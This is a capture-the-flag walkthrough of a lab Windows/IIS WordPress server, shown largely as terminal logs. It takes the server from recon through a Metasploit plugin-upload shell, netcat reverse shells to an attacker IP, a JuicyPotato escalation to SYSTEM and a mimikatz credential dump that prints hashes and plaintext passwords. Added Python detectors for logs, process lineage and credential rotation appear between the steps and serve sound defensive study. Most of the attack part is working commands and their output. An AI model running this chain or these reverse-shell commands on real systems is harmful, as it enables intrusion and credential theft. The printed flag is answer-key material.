$ nmap -p- -T4 -A 10.10.10.29
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
$ dirb http://10.10.10.29
---- Scanning URL: http://10.10.10.29/ ----
==> DIRECTORY: http://10.10.10.29/wordpress/
Log in at http://10.10.10.29/wordpress/ with admin/P@s5w0rd!
$ wpscan --url http://10.10.10.29/wordpress/
This administrative access can be leveraged through the Metasploit module exploit/unix/webapp/wp_admin_shell_upload to get a Meterpreter shell on the system.
$ msfconsole
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOST 10.10.10.29
RHOST => 10.10.10.29
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.197
LHOST => 10.10.14.197
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 10.10.14.197:4444
[*] Authenticating with WordPress using admin:P@s5w0rd!...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/fogcxdzKET/HECmDltuPy.php...
[*] Sending stage (39282 bytes) to 10.10.10.29
[+] Deleted HECmDltuPy.php
[+] Deleted fogcxdzKET.php
[*] Meterpreter session 1 opened (10.10.14.197:4444 -> 10.10.10.29:51938) at 2021-05-04 12:03:39 -0400
[!] This exploit may require manual cleanup of '../fogcxdzKET' on the target
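From the defender's side, the run above leaves a very recognisable trace in the IIS logs: an authenticated POST to wp-login.php, a plugin upload through wp-admin, and then a request for a PHP file under wp-content/plugins/ whose directory and file names are random letter blobs (fogcxdzKET/HECmDltuPy.php here). The following detector is an added example written for this writeup, not code from the author or from Metasploit. It assumes W3C extended logging with the #Fields header shown in the constructed sample, and that the plugin is delivered through wp-admin/update.php with action=upload-plugin; the allowlist of plugin directories is a placeholder.

```python
"""Detect the WordPress plugin-upload shell pattern in IIS W3C logs.

Added example for this walkthrough (not the author's or Metasploit's code).
Assumes the #Fields header used in the sample and that the plugin upload
goes through wp-admin/update.php?action=upload-plugin.
"""
import re
from datetime import datetime, timedelta

# Constructed sample log: the attacker chain from 10.10.14.197 plus two benign requests.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-05-04 16:03:35 10.10.10.29 POST /wordpress/wp-login.php - 80 - 10.10.14.197 Mozilla/5.0 302
2021-05-04 16:03:36 10.10.10.29 GET /wordpress/wp-admin/plugin-install.php - 80 - 10.10.14.197 Mozilla/5.0 200
2021-05-04 16:03:37 10.10.10.29 POST /wordpress/wp-admin/update.php action=upload-plugin 80 - 10.10.14.197 Mozilla/5.0 200
2021-05-04 16:03:38 10.10.10.29 GET /wordpress/wp-content/plugins/fogcxdzKET/HECmDltuPy.php - 80 - 10.10.14.197 Mozilla/5.0 200
2021-05-04 16:05:00 10.10.10.29 GET /wordpress/wp-content/plugins/akismet/akismet.php - 80 - 192.168.1.20 Mozilla/5.0 200
2021-05-04 16:06:00 10.10.10.29 GET /wordpress/ - 80 - 192.168.1.21 Mozilla/5.0 200
"""

# A PHP file whose directory and basename are both 8-12 letter blobs directly under plugins/.
PLUGIN_HIT = re.compile(r"/wp-content/plugins/([A-Za-z]{8,12})/([A-Za-z]{8,12})\.php$")
# Site-specific allowlist of legitimate plugin directories (placeholder values).
KNOWN_PLUGIN_DIRS = {"akismet", "hello", "wordfence"}


def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated line: skip rather than misalign columns
        row = dict(zip(fields, parts))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def looks_random(name):
    """Generated plugin names mix upper and lower case; real plugin dirs are lowercase."""
    return any(c.isupper() for c in name) and any(c.islower() for c in name)


def detect_plugin_shell_upload(text, window=timedelta(minutes=5)):
    """Return findings for requests to a random-named plugin PHP file.

    Severity is 'high' when the same client POSTed a plugin upload within
    `window` before the hit (the full module chain), otherwise 'medium'.
    """
    last_upload = {}  # client IP -> time of its most recent plugin upload
    findings = []
    for row in parse_w3c(text):
        ip, method = row["c-ip"], row["cs-method"]
        stem, query = row["cs-uri-stem"], row["cs-uri-query"]
        if method == "POST" and stem.endswith("/wp-admin/update.php") and "action=upload-plugin" in query:
            last_upload[ip] = row["ts"]
            continue
        m = PLUGIN_HIT.search(stem)
        if not m:
            continue
        plugin_dir = m.group(1)
        if plugin_dir in KNOWN_PLUGIN_DIRS or not looks_random(plugin_dir):
            continue
        uploaded = last_upload.get(ip)
        chained = uploaded is not None and timedelta(0) <= row["ts"] - uploaded <= window
        findings.append({
            "client": ip,
            "path": stem,
            "time": row["ts"].isoformat(),
            "severity": "high" if chained else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in detect_plugin_shell_upload(SAMPLE_LOG):
        print(finding)
```

Run against the sample it reports a single high-severity finding for 10.10.14.197. The naming heuristic alone is worth a medium alert because the module deletes the plugin files after use (see the "Deleted" lines above), so the web log may be the only artefact left; the upload POST shortly before it raises the confidence. The same chain is also a reason to block plugin installation from the dashboard (DISALLOW_FILE_MODS in wp-config.php) on servers that do not need it.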
meterpreter > ls
Listing: C:\inetpub\wwwroot\wordpress\wp-content\plugins\fogcxdzKET
===================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
HECmDltuPy.php
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > ls
Listing: C:\inetpub\wwwroot\wordpress\wp-content\uploads
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 18093 fil 2020-02-10 06:07:10 -0500 black-shield-shape-drawing-illustration-png-clip-art-150x150.png
100666/rw-rw-rw- 20083 fil 2020-02-10 06:07:10 -0500 black-shield-shape-drawing-illustration-png-clip-art-273x300.png
100666/rw-rw-rw- 254028 fil 2020-02-10 06:07:10 -0500 black-shield-shape-drawing-illustration-png-clip-art-768x844.png
100666/rw-rw-rw- 11676 fil 2020-02-10 06:07:09 -0500 black-shield-shape-drawing-illustration-png-clip-art.png
100666/rw-rw-rw- 23065 fil 2020-02-10 06:07:21 -0500 cropped-black-shield-shape-drawing-illustration-png-clip-art-150x150.png
100666/rw-rw-rw- 36889 fil 2020-02-10 06:07:21 -0500 cropped-black-shield-shape-drawing-illustration-png-clip-art.png
meterpreter > upload nc.exe
[*] uploading : /home/kali/0.htb/Starting_Point/Shield29/nc.exe -> nc.exe
[*] Uploaded -1.00 B of 58.00 KiB (-0.0%): /home/kali/0.htb/Starting_Point/Shield29/nc.exe -> nc.exe
[*] uploaded : /home/kali/0.htb/Starting_Point/Shield29/nc.exe -> nc.exe
meterpreter > upload js.exe
[*] uploading : /home/kali/0.htb/Starting_Point/Shield29/js.exe -> js.exe
[*] Uploaded -1.00 B of 339.50 KiB (-0.0%): /home/kali/0.htb/Starting_Point/Shield29/js.exe -> js.exe
[*] uploaded : /home/kali/0.htb/Starting_Point/Shield29/js.exe -> js.exe
meterpreter > upload mimikatz.exe
[*] uploading : /home/kali/0.htb/Starting_Point/Shield29/mimikatz.exe -> mimikatz.exe
[*] Uploaded -1.00 B of 1.25 MiB (0.0%): /home/kali/0.htb/Starting_Point/Shield29/mimikatz.exe -> mimikatz.exe
[*] uploaded : /home/kali/0.htb/Starting_Point/Shield29/mimikatz.exe -> mimikatz.exe
meterpreter > ls
c:\inetpub\wwwroot\wordpress\wp-content\uploads>
05/04/2021 04:01 PM 347,648 js.exe (renamed copy of JuicyPotato.exe)
05/04/2021 04:01 PM 1,309,448 mimikatz.exe
05/04/2021 04:00 PM 59,392 nc.exe
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1234
meterpreter > execute -f nc.exe -a "-e cmd.exe 10.10.14.197 1234"
Process 4216 created.
meterpreter >
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.29] 49978
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\inetpub\wwwroot\wordpress\wp-content\uploads>
c:\inetpub\temp\appPools>ver
Microsoft Windows [Version 10.0.14393]
c:\inetpub\wwwroot\wordpress>type wp-config.php
define('DB_NAME', 'wordpress124');
/** MySQL database username */
define('DB_USER', 'wordpressuser124');
/** MySQL database password */
define('DB_PASSWORD', 'P_-U9dA6q.B|');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Juicy Potato (uploaded above as js.exe): https://github.com/ohpe/juicy-potato/releases
C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.197 1111 >shell.bat
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.197 1111 >shell.bat
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1111
listening on [any] 1111 ...
C:\inetpub\wwwroot\wordpress\wp-content\uploads>js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\inetpub\wwwroot\wordpress\wp-content\uploads>
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.29] 51982
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
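The escalation above is visible almost entirely in process lineage: the IIS worker (w3wp.exe) ends up as an ancestor of nc.exe and cmd.exe, the executables run from the web-writable uploads directory, and the final cmd.exe runs as NT AUTHORITY\SYSTEM although its parent (js.exe) does not, which is exactly what CreateProcessWithTokenW produces. The detector below is an added example for this writeup, not code from the author or from any product. It assumes process-creation records in the style of Sysmon Event ID 1 with at least pid, ppid, image, user and cmdline fields; parent attributes are looked up from the same batch rather than trusted from the record. The sample events are constructed (made-up pids, an assumed php-cgi.exe path) to mirror the chain on this page.

```python
"""Process-lineage detection for the web shell -> nc -> JuicyPotato chain.

Added example for this walkthrough, not the author's code. Assumes
Sysmon Event ID 1 style records with pid, ppid, image, user, cmdline.
"""
import ntpath

WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
WEB_WRITABLE_ROOT = r"c:\inetpub\wwwroot"  # anything executed from here was written by the web app or an intruder
SYSTEM_USER = r"nt authority\system"

# Constructed records mirroring the session above; pids and the php-cgi.exe path are assumptions.
SAMPLE_EVENTS = [
    {"pid": 2000, "ppid": 800, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "user": r"IIS APPPOOL\wordpress", "cmdline": "w3wp.exe -ap wordpress"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\PHP\php-cgi.exe",
     "user": r"IIS APPPOOL\wordpress", "cmdline": "php-cgi.exe"},
    {"pid": 3100, "ppid": 2100, "image": r"C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe",
     "user": r"IIS APPPOOL\wordpress", "cmdline": "nc.exe -e cmd.exe 10.10.14.197 1234"},
    {"pid": 3200, "ppid": 3100, "image": r"C:\Windows\System32\cmd.exe",
     "user": r"IIS APPPOOL\wordpress", "cmdline": "cmd.exe"},
    {"pid": 3300, "ppid": 3200, "image": r"C:\inetpub\wwwroot\wordpress\wp-content\uploads\js.exe",
     "user": r"IIS APPPOOL\wordpress",
     "cmdline": r"js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337"},
    {"pid": 3400, "ppid": 3300, "image": r"C:\Windows\System32\cmd.exe",
     "user": r"NT AUTHORITY\SYSTEM", "cmdline": r"cmd.exe /c C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat"},
    {"pid": 4000, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "user": r"MEGACORP\sandra", "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "user": r"MEGACORP\sandra", "cmdline": "cmd.exe"},
]


def basename(path):
    return ntpath.basename(path).lower()


def ancestry(event, by_pid):
    """Parent chain, nearest first; stops at unknown pids or cycles."""
    chain, seen = [], set()
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def classify(event, by_pid):
    """Reasons this process creation deserves attention (empty list if none)."""
    reasons = []
    parents = ancestry(event, by_pid)
    under_web_worker = any(basename(p["image"]) in WEB_WORKERS for p in parents)
    if under_web_worker and basename(event["image"]) in SHELLS:
        reasons.append("shell/interpreter spawned beneath the IIS worker process")
    if event["image"].lower().startswith(WEB_WRITABLE_ROOT):
        reasons.append("executable launched from the web-writable document root")
    parent = parents[0] if parents else None
    if parent and event["user"].lower() == SYSTEM_USER and parent["user"].lower() != SYSTEM_USER:
        reasons.append("runs as SYSTEM although the parent does not (token impersonation)")
    return reasons


def detect(events):
    """Evaluate a batch of process-creation events and return the suspicious ones."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        reasons = classify(e, by_pid)
        if reasons:
            findings.append({"pid": e["pid"], "image": e["image"], "user": e["user"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

On the sample the four processes from nc.exe onwards are flagged and sandra's interactive cmd.exe is not. The third rule is the one specific to the Potato family: the impersonation only works because the application pool identity holds SeImpersonatePrivilege, so removing executable permissions from the uploads directory (or enforcing an application control policy there) and denying the app pool that privilege where the application does not need it both remove a step of this chain.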
PS C:\Windows\system32> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/25/2020 1:28 PM 32 root.txt
PS C:\users\administrator\desktop> type root.txt
type root.txt
6e9a9fdc6f64e410a68b847bb4b404fa
PS C:\users\administrator\desktop> copy c:\inetpub\wwwroot\wordpress\wp-content\uploads\mimikatz.exe .
copy c:\inetpub\wwwroot\wordpress\wp-content\uploads\mimikatz.exe .
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2021 4:01 PM 1309448 mimikatz.exe
-ar--- 2/25/2020 1:28 PM 32 root.txt
PS C:\users\administrator\desktop> ./mimikatz.exe sekurlsa::logonpasswords
./mimikatz.exe sekurlsa::logonpasswords
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1334026 (00000000:00145b0a)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 5/4/2021 2:30:33 PM
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 65636 (00000000:00010064)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SHIELD$
Domain : MEGACORP
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : shield$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 297853 (00000000:00048b7d)
Session : Interactive from 1
User Name : sandra
Domain : MEGACORP
Logon Server : PATHFINDER
Logon Time : 5/4/2021 2:16:27 PM
SID : S-1-5-21-1035856440-4137329016-3276773158-1105
msv :
[00000003] Primary
* Username : sandra
* Domain : MEGACORP
* NTLM : 29ab86c5c4d2aab957763e5c1720486d
* SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
* DPAPI : f4c73b3f07c4f309ebf086644254bcbc
tspkg :
wdigest :
* Username : sandra
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : sandra
* Domain : MEGACORP.LOCAL
* Password : Password1234!
ssp :
credman :
Authentication Id : 0 ; 167921 (00000000:00028ff1)
Session : Service from 0
User Name : wordpress
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 5/4/2021 2:15:31 PM
SID : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/4/2021 2:15:13 PM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 65655 (00000000:00010077)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 36398 (00000000:00008e2e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 5/4/2021 2:15:09 PM
SID :
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SHIELD$
Domain : MEGACORP
Logon Server : (null)
Logon Time : 5/4/2021 2:15:09 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : shield$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
mimikatz # ls
ERROR mimikatz_doLocal ; "ls" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # exit
Bye!
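Once a dump like the one above has been taken, the response question is which secrets must be rotated: here the machine account SHIELD$ (NTLM hash and Kerberos secret), the domain user sandra (NTLM hash plus a plaintext password held by the kerberos package), and the virtual IIS APPPOOL and NT AUTHORITY identities that have nothing to rotate. The triage script below is an added example for this writeup, not part of mimikatz or of the author's notes. It parses the text layout shown above (Authentication Id blocks, "msv :"/"wdigest :"/"kerberos :" sections, "* Key : Value" lines) and tolerates the indentation being lost in a paste; the sample dump is constructed with placeholder hashes and passwords rather than the values from the target.

```python
"""Triage of a sekurlsa::logonpasswords dump: which secrets must be rotated.

Added example, not part of mimikatz or of this walkthrough. Parses the text
layout shown above and tolerates lost indentation; sample values are
constructed placeholders, not the target's hashes.
"""
import re
from collections import defaultdict

SECTION_RE = re.compile(r"^(msv|tspkg|wdigest|kerberos|ssp|credman)\s*:\s*$")
FIELD_RE = re.compile(r"^\*\s*(Username|Domain|Password|NTLM|SHA1)\s*:\s*(.*)$")
# Domains that denote Windows virtual/service identities rather than real principals.
SERVICE_DOMAINS = {"iis apppool", "window manager", "nt authority", "font driver host"}

SAMPLE_DUMP = """\
Authentication Id : 0 ; 1334026 (00000000:00145b0a)
User Name : DefaultAppPool
Domain : IIS APPPOOL
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 00000000000000000000000000000001
tspkg :
kerberos :
* Username : shield$
* Domain : MEGACORP.LOCAL
* Password : <constructed-machine-secret>
Authentication Id : 0 ; 297853 (00000000:00048b7d)
msv :
[00000003] Primary
* Username : sandra
* Domain : MEGACORP
* NTLM : 00000000000000000000000000000002
wdigest :
* Username : sandra
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : sandra
* Domain : MEGACORP.LOCAL
* Password : <constructed-plaintext>
"""


def parse_logonpasswords(text):
    """Map 'DOMAIN\\user' -> exposures: 'ntlm' and/or 'plaintext:<package>'."""
    exposures = defaultdict(set)

    def flush(entry, section):
        user = entry.get("Username")
        if not user or user == "(null)":
            return
        # MEGACORP and MEGACORP.LOCAL are the same realm; usernames are case-insensitive.
        key = f"{(entry.get('Domain') or '').split('.')[0].upper()}\\{user.lower()}"
        if entry.get("NTLM") not in (None, "(null)"):
            exposures[key].add("ntlm")
        if entry.get("Password") not in (None, "(null)"):
            exposures[key].add(f"plaintext:{section}")

    section, entry = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        sec = SECTION_RE.match(line)
        if sec or line.startswith("Authentication Id"):
            flush(entry, section)
            entry, section = {}, (sec.group(1) if sec else None)
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "Username" and entry:  # a second credential entry in the same section
            flush(entry, section)
            entry = {}
        entry[key] = value
    flush(entry, section)
    return dict(exposures)


def account_kind(key):
    domain, user = key.split("\\", 1)
    if domain.lower() in SERVICE_DOMAINS:
        return "virtual"
    return "machine" if user.endswith("$") else "user"


ACTIONS = {
    "user": "reset password, invalidate sessions, review this user's logons since the dump",
    "machine": "reset the computer account password; treat the host as compromised",
    "virtual": "nothing to rotate; the host itself is the compromised asset",
}


def rotation_plan(text):
    """Sorted list of accounts found in LSASS, what leaked, and the follow-up action."""
    plan = []
    for key, exp in sorted(parse_logonpasswords(text).items()):
        kind = account_kind(key)
        plaintext = sorted(e.split(":", 1)[1] for e in exp if e.startswith("plaintext:"))
        plan.append({"account": key, "kind": kind, "ntlm_exposed": "ntlm" in exp,
                     "plaintext_in": plaintext, "action": ACTIONS[kind]})
    return plan
```

Feeding the real dump above through rotation_plan gives two rotation items (MEGACORP\sandra and MEGACORP\shield$) plus the virtual identities. Note that wdigest shows (null) on this 10.0.14393 host because WDigest plaintext caching is off by default, yet sandra's password was still recoverable from the kerberos package; that is what LSA protection (RunAsPPL) and Credential Guard are for, and why an interactive logon by a domain user on a web server is itself a finding.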